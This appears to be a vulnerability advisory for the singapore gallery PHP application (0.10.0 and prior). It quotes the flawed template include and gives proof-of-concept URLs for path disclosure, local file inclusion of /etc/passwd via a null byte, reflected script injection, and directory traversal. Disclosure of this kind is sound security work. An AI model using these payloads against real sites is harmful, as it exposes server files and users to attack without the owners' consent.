Produce       : singapore gallery

Versions      : 0.10.0 and prior

Site          : http://www.sgal.org/

Discovred By  : Moroccan Security Research Team (Simo64)

Greetz        : CiM-Team - dabdoub - DarkbiteX - drackanz - Iss4m - Mourad - Rachid

.:r00tkita - s4mi - Silitix - tahati -   And All Friends :)

[-] Vulnerable code near lignes 16-35

<?

16 .  require_once "includes/singapore.class.php";

19 .  $sg = new Singapore();

35 .  include $sg->config->base_path.$sg->config->pathto_current_template."index.tpl.p
hp";

?>

[+] Full Path Disclosure :

**************************

Exemple:

http://localhost/singapore/index.php?template=simo64

Result :

Warning: main(templates/simo64/index.tpl.php): failed to open stream: No such file or directory in /home/sing/public_html/livedemo/index.php on line 35

[+] Local File Inclusion :

***************************

Proof Of Concept :

http://localhost/singapore/index.php?template=./../../../../etc/passwd%0
0

[+] Cross Site Scripting :

**************************

http://localhost/singapore/index.php?template=<script>alert('Moroccan Security Team');</script>

[+] Directory Traversal  :

**************************

Proof Of Concept :

http://localhost/singapore/index.php?gallery=./../../../